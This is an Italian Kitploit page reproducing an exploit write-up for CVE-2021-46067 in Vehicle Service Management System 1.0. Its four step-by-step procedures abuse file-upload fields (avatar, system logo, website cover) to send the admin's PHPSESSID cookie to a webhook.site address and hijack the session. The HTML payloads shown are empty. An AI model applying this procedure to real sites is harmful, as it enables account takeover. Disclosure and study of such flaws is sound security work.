Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover — CVE-2021-46067 - In Vehicle Service Management System 1.0 un attaccante può rubare i cookie portando alla completa compromissione dell'account. | Kitploit
Strumenti/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubsanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover

Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-46067 - In Vehicle Service Management System 1.0 un attaccante può rubare i cookie portando alla completa compromissione dell'account.

Vedi Repository
3 mesi faNon ancora revisionato

CVE-2021-46067

Titolo dell'exploit: Vehicle Service Management System - 'Multiplo' Furto di Cookie Porta al Completo Dirottamento dell'Account

Autore dell'exploit: SANU P.L

CVE: CVE-2021-46067

CVSS: 9.8 CRITICAL

Riferimenti:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46067
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46067

Descrizione:

In Vehicle Service Management System 1.0 un attaccante può rubare i cookie portando al completo dirottamento dell'account.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione My Account http://localhost/vehicle_service/admin/?page=user
  3. Genera l'URL del Webhook - https://webhook.site
  4. Copia l'URL univoco del Webhook e incollalo nel codice html qui sotto.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Salva il codice html qui sopra, ad es.: Cookie Stealing.html
  2. Nella sezione My Account inserisci tutti i dettagli richiesti e seleziona il file html nel campo Avatar.
  3. Fai clic sul pulsante Aggiorna.
  4. Apri l'immagine dell'avatar in una nuova scheda e controlla lo stato del Webhook.
  5. Abbiamo ricevuto la richiesta: contiene PHPSESSID.
  6. Copia il valore di PHPSESSID e apri un altro browser.
  7. Visita il pannello di amministrazione http://localhost/vehicle_service/admin
  8. Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
  9. Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  10. Accesso all'account riuscito. Dirottamento dell'account completato con successo.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione User List e fai clic sul pulsante Create New.
  3. Genera l'URL del Webhook - https://webhook.site
  4. Copia l'URL univoco del Webhook e incollalo nel codice html qui sotto.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Salva il codice html qui sopra, ad es.: Cookie Stealing.html
  2. Nella sezione Create New User inserisci tutti i dettagli richiesti e seleziona il file html nel campo Avatar.
  3. Fai clic sul pulsante Save.
  4. Apri l'immagine dell'avatar in una nuova scheda e controlla lo stato del Webhook.
  5. Abbiamo ricevuto la richiesta: contiene PHPSESSID.
  6. Copia il valore di PHPSESSID e apri un altro browser.
  7. Visita il pannello di amministrazione http://localhost/vehicle_service/admin
  8. Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
  9. Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  10. Accesso all'account riuscito. Dirottamento dell'account completato con successo.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Settings http://localhost/vehicle_service/admin/?page=system_info
  3. Genera l'URL del Webhook - https://webhook.site
  4. Copia l'URL univoco del Webhook e incollalo nel codice html qui sotto.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Salva il codice html qui sopra, ad es.: Cookie Stealing.html
  2. Nella sezione Settings inserisci tutti i dettagli richiesti e seleziona il file html nel campo System Logo.
  3. Fai clic sul pulsante Aggiorna.
  4. Apri l'immagine System Logo in una nuova scheda e controlla lo stato del Webhook.
  5. Abbiamo ricevuto la richiesta: contiene PHPSESSID.
  6. Copia il valore di PHPSESSID e apri un altro browser.
  7. Visita il pannello di amministrazione http://localhost/vehicle_service/admin
  8. Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
  9. Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  10. Accesso all'account riuscito. Dirottamento dell'account completato con successo.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Settings http://localhost/vehicle_service/admin/?page=system_info
  3. Genera l'URL del Webhook - https://webhook.site
  4. Copia l'URL univoco del Webhook e incollalo nel codice html qui sotto.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Salva il codice html qui sopra, ad es.: Cookie Stealing.html
  2. Nella sezione Settings inserisci tutti i dettagli richiesti e seleziona il file html nel campo Website Cover.
  3. Fai clic sul pulsante Aggiorna.
  4. Apri l'immagine Website Cover in una nuova scheda e controlla lo stato del Webhook.
  5. Abbiamo ricevuto la richiesta: contiene PHPSESSID.
  6. Copia il valore di PHPSESSID e apri un altro browser.
  7. Visita il pannello di amministrazione http://localhost/vehicle_service/admin
  8. Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
  9. Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  10. Accesso all'account riuscito. Dirottamento dell'account completato con successo.

Impatto:

Un attaccante carica un file html dannoso che reindirizza a un sito web di terze parti e i cookie vengono esposti nella richiesta. Ciò porta al completo dirottamento dell'account.

Mitigazione:

Si consiglia di convalidare la funzionalità di upload dei file e di eseguire controlli secondari nella sessione.

Scarica lo strumento